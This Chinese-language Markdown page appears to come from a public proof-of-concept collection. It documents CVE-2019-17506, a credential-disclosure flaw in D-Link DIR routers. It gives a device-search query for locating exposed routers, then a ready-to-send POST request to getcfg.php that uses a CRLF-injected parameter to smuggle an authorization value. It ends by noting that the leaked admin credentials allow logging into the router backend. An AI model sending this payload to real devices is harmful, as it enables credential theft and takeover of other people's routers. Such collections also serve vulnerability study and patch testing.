Awesome-POC/网络设备漏洞/D-Link DIR-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506.md
2024-11-06 14:10:36 +08:00

40 lines
962 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506
## 漏洞描述
D-Link DIR-868L B1-2.03和DIR-817LW A1-1.04路由器上有一些不需要身份验证的Web界面。攻击者可以通过SERVICES的DEVICE.ACCOUNT值以及AUTHORIZED_GROUP = 10a来获取getcfg.php的路由器的用户名和密码以及其他信息。这可用于远程控制路由器
## 漏洞影响
```
D-Link Dir 系列多个版本
```
## 网络测绘
```
app="D_Link-DIR-868L"
```
## 漏洞复现
登录页面如下
![](images/202202162225738.png)
发送下请求包
```plain
POST /getcfg.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 61
SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
```
![](images/202202162226400.png)
获取到路由器账号密码即可登录后台